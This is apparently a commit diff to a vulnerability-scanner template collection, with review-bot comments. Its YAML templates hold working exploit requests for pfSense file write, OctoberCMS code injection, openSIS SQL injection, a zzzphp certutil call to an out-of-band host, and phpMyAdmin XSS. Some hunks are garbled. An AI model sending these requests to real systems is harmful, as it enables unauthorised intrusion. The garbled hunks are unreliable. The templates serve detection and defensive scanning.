- metadata: - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" + - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0 + remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. 
classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 10.0 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-41277 - cwe-id: CWE-200 + cwe-id: CWE-20 + metadata: + fofa-query: app="Metabase" + shodan-query: http.title:"Metabase" tags: cve,cve2021,metabase,lfi requests: @@ -33,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41282.yaml b/cves/2021/CVE-2021-41282.yaml new file mode 100644 index 0000000000..971c79f985 --- /dev/null +++ b/cves/2021/CVE-2021-41282.yaml 
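Review bot: The added `remediation:` (first hunk, which starts on the previous physical line) says `fixed in 0.40.5 and .40.5 and higher`; the removed description had `0.40.5 and 1.40.5`, so the second version lost its leading digit and should read `This issue is fixed in 0.40.5 and 1.40.5 and higher.`. The new description also says `a local file inclusion security issue ... and potential local file inclusion`, repeating itself; dropping the second phrase keeps the meaning. The classification rewrite lowers the score from 10.0 to 7.5 and swaps CWE-200 for CWE-20 without saying which source the new vector comes from, so a short note of that source would help the next maintainer.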
@@ -0,0 +1,55 @@ +id: CVE-2021-41282 + +info: + name: pfSense Arbitrary File Write to RCE + author: cckuailong + severity: high + description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + reference: + - https://www.shielder.it/advisories/pfsense-remote-command-execution/ + - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-41282 + cwe-id: CWE-94 + tags: cve,cve2021,pfsense,rce,authenticated + +requests: + - raw: + - | + GET /index.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= + + - | + GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /test.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - '(sid:[a-z0-9,;:]+)' + + matchers: + - type: dsl + dsl: + - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" + - "status_code==200" + condition: and \ No newline at end of file 
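Review bot: The third raw request writes `/usr/local/www/test.php` onto the target and relies on the payload's own `unlink(__FILE__)` in the fourth request to remove it, so a scan that stops after request three (timeout, WAF, lost cookie) leaves a reachable PHP file on the firewall, and the template does not say so. Add a comment above `raw:` such as `# Intrusive: writes /usr/local/www/test.php on the target; the file removes itself only when the final GET succeeds` and include `intrusive` in `tags:` so operators can exclude it with `-etags`. The file also ends without a trailing newline (`\ No newline at end of file`), which this same commit fixes in several other templates, and it lacks the `# Enhanced by` trailer every other template here carries.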
diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml index b0e8b161ea..10aefe5f92 100644 --- a/cves/2021/CVE-2021-41291.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -4,16 +4,18 @@ info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high - description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - tags: cve,cve2021,ecoa,lfi + - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 + tags: cve,cve2021,ecoa,lfi,traversal requests: - raw: @@ -24,4 +26,6 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index 4a4c48e176..ab9790a110 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml 
@@ -1,19 +1,21 @@ id: CVE-2021-41293 info: - name: ECOA Building Automation System - LFD + name: ECOA Building Automation System - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose + sensitive and system information. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html - tags: cve,cve2021,ecoa,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 + tags: cve,cve2021,ecoa,lfi,disclosure requests: - raw: @@ -28,8 +30,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index 225d1a6a33..c1c31e9fbf 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml 
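Review bot: The rewritten `description:` is a plain scalar continued onto a second physical line (`...and disclose` / `sensitive and system information.`); YAML folds that into one string, but a continuation at the wrong indent silently changes the parse, so `description: >-` followed by the indented text carries the same value more robustly. The regex change to `root:.*:0:0:` matches `CVE-2021-40960.yaml` in this commit, which is good. The new tag `disclosure` differs from the sibling `CVE-2021-41291.yaml`, which chose `traversal` for the same ECOA product; consider aligning the two.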
@@ -1,19 +1,20 @@ id: CVE-2021-41349 info: - name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange + name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting author: rootxharsh,iamnoooob severity: medium - tags: cve,cve2021,xss,microsoft,exchange - description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305. + description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. reference: + - https://www.microsoft.com/en-us/download/details.aspx?id=103643 - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2021-41349 + tags: cve,cve2021,xss,microsoft,exchange requests: - raw: @@ -39,4 +40,6 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml index ff9081fb62..3967477b8a 100644 --- a/cves/2021/CVE-2021-41381.yaml +++ b/cves/2021/CVE-2021-41381.yaml 
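Review bot: The new `name:` calls this a Reflected Cross-Site Scripting issue while the new `description:` calls it only `a spoofing vulnerability`, so the two lines now disagree about what is being detected. A description that says both, e.g. `Microsoft Exchange Server is vulnerable to a pre-auth POST-based reflected cross-site scripting issue that Microsoft classifies as spoofing. This CVE ID is unique from CVE-2021-42305.`, keeps the MSRC wording without losing the XSS framing. This is also the only template in the commit whose `classification:` has no `cwe-id`; if the NVD entry lists one, add it for consistency.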
@@ -3,17 +3,18 @@ id: CVE-2021-41381 info: name: Payara Micro Community 5.2021.6 Directory Traversal author: pikpikcu - severity: medium - description: Payara Micro Community 5.2021.6 and below allows Directory Traversal + severity: high + description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. reference: - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 - tags: cve,cve2021,payara,lfi + - https://www.payara.fish classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 + tags: cve,cve2021,payara,lfi requests: - method: GET @@ -28,3 +29,5 @@ requests: - "payara.security.openid.sessionScopedConfiguration=true" condition: and part: body + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml index 67ba68c3a7..d82d191d05 100644 --- a/cves/2021/CVE-2021-41467.yaml +++ b/cves/2021/CVE-2021-41467.yaml 
@@ -1,21 +1,21 @@ id: CVE-2021-41467 info: - name: JustWriting - Reflected XSS + name: JustWriting - Reflected Cross-Site Scripting author: madrobot severity: medium - description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. reference: - https://github.com/hjue/JustWriting/issues/106 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 + - https://github.com/hjue/JustWriting/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 tags: cve,cve2021,justwriting,xss - requests: - method: GET path: @@ -36,3 +36,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml index cd7789ebef..3df8e64753 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41648.yaml 
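Review bot: The rewritten description says `A cross-site scripting vulnerability ... allow remote attackers`; the subject is singular, so it should be `allows remote attackers`. The hunk also removes the blank line between `tags:` and `requests:`, which every other template in this commit keeps; restoring it keeps the layout uniform. Swapping the MITRE link for the NVD link is fine, but the added `https://github.com/hjue/JustWriting/` is the project root rather than an advisory, so it may fit better as a `product:` entry under `metadata:`, as `CVE-2022-24112.yaml` does, than in `reference:`.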
@@ -1,17 +1,20 @@ id: CVE-2021-41648 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php + name: PuneethReddyHC action.php SQL Injection author: daffainfo severity: high - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41648 - tags: cve,cve2021,sqli + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41648 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 + tags: cve,cve2021,sqli,injection requests: - method: POST @@ -38,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml index f9b72ad760..62b8d68451 100644 --- a/cves/2021/CVE-2021-41649.yaml +++ b/cves/2021/CVE-2021-41649.yaml 
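Review bot: The added reference `https://nvd.nist.gov/vuln/detail/CVE-2021-41649` points at the neighbouring CVE, not this one; in `CVE-2021-41648.yaml` it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-41648` (the same line in `CVE-2021-41649.yaml` is correct). The two sibling templates also name the product differently now (`PuneethReddyHC action.php SQL Injection` here, `PuneethReddyHC Online Shopping System homeaction.php SQL Injection` in the other); the longer form matches both descriptions and should be used in both names.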
@@ -1,17 +1,20 @@ id: CVE-2021-41649 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php + name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection author: daffainfo severity: critical - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41649 - tags: cve,cve2021,sqli + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41649 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 + tags: cve,cve2021,sqli,injection requests: - method: POST @@ -37,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index 4626e4d030..bbc4fdbe67 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml 
@@ -2,15 +2,17 @@ id: CVE-2021-41653 info: name: TP-Link - OS Command Injection - description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field. author: gy741 severity: critical + description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 + - https://www.tp-link.com/us/press/security-advisory/ + remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 tags: cve,cve2021,tplink,rce,router @@ -43,6 +45,8 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml new file mode 100644 index 0000000000..e4c0c19078 --- /dev/null +++ b/cves/2021/CVE-2021-41691.yaml 
@@ -0,0 +1,51 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQL Injection + author: Bartu Utku SARP + severity: high + description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://www.exploit-db.com/exploits/50637 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 + classification: + cve-id: CVE-2021-41691 + tags: cve,cve2021,opensis,sqli,auth + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + + - | + POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + attack: pitchfork + payloads: + username: + - student + + password: + - student@123 + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "' + condition: and + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-21705.yaml b/cves/2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..397ba79309 --- /dev/null +++ b/cves/2022/CVE-2022-21705.yaml 
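Review bot: The MITRE reference is truncated to `CVE-2021-4169`, which is a different identifier; it should be `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691`. The `dsl:` line `contains(body_2, "` ends in an open quote in this view, so the expected marker appears to be missing or garbled and must be checked in the committed file before merge. The login step hard-codes `student`/`student@123` through `payloads:` whereas `CVE-2021-41282.yaml` and `CVE-2022-21705.yaml` in this commit take `{{username}}`/`{{password}}` from the command line, so this template only ever exercises one default account; a comment saying so, or the same variable convention, would make that clear. `classification:` also has no `cvss-metrics`/`cvss-score`, unlike every other new template here.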
@@ -0,0 +1,107 @@ +id: CVE-2022-21705 + +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection + + +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: 
onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + + cookie-reuse: true + + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + + - type: regex + name: theme + part: body + group: 1 + regex: + - '

301 Moved Permanently

' + + - type: regex + part: location + regex: + - 'https?:\/\/(.*):' + + extractors: + - type: regex + part: location + group: 1 + regex: + - 'https?:\/\/(.*):' + +# Enhanced by mp on 2022/03/28 diff --git a/cves/2022/CVE-2022-23808.yaml b/cves/2022/CVE-2022-23808.yaml new file mode 100644 index 0000000000..b174bac40d --- /dev/null +++ b/cves/2022/CVE-2022-23808.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-23808 + +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo + severity: medium + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + reference: + - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A + - https://github.com/dipakpanchal456/CVE-2022-23808 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23808 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "\">" + - "
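Review bot: The third raw request of `CVE-2022-21705.yaml` (hunk begins on L600 of this view) saves a new CMS page named `{{randstr}}` whose markup calls `phpinfo()`, and nothing in the template deletes it afterwards, so every positive scan leaves a publicly reachable page on the target; add `intrusive` to `tags:` and a comment above `raw:` naming the artifact and the admin credentials the template expects. In the fifth request the query string is `{{theme}}=demo`, which uses the extracted theme name as the parameter key and hard-codes `demo` as the value, while the third request hard-codes `theme=demo`; this looks like it was meant to be `theme={{theme}}` in both, otherwise the `theme` extractor is unused — please confirm. The middle of the hunk (the `theme` regex and the matchers) is garbled in this view and could not be reviewed, and `tags:` is followed by two blank lines where the rest of the commit uses one.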

Add a new server

" + - "phpMyAdmin setup" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-23881.yaml b/cves/2022/CVE-2022-23881.yaml new file mode 100644 index 0000000000..73150a422c --- /dev/null +++ b/cves/2022/CVE-2022-23881.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + tags: cve,cve2022,rce,zzzphp,zzzcms + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/19 diff --git a/cves/2022/CVE-2022-23944.yaml b/cves/2022/CVE-2022-23944.yaml new file mode 100644 index 0000000000..de7aa65f39 --- /dev/null +++ b/cves/2022/CVE-2022-23944.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2022-23944
+
+info:
+ name: Apache ShenYu Admin Unauth Access
+ author: cckuakilong
+ severity: critical
+ description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+ reference:
+ - https://github.com/apache/incubator-shenyu/pull/2462
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23944
+ - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
+ - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y
+ remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2022-23944
+ cwe-id: CWE-306
+ tags: cve,cve2022,shenyu,unauth,apache
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plugin"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"message":"query success"'
+ - '"code":200'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/08
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
new file mode 100644
index 0000000000..119a801f06
--- /dev/null
+++ b/cves/2022/CVE-2022-24112.yaml
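Review bot: `author: cckuakilong` is a misspelling of the handle used in `CVE-2021-41282.yaml` and `CVE-2022-23808.yaml` in this same commit and of the GitHub account in the reapoc reference; it should be `author: cckuailong`. The name `Apache ShenYu Admin Unauth Access` abbreviates where the sibling templates spell things out; `Apache ShenYu Admin - Unauthenticated Access` follows the naming pattern used elsewhere in the commit. The matcher itself is sound: it requires both JSON success fields and the HTTP status.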
@@ -0,0 +1,80 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX - Remote Code Execution + author: Mr-xn + severity: critical + description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + reference: + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). 
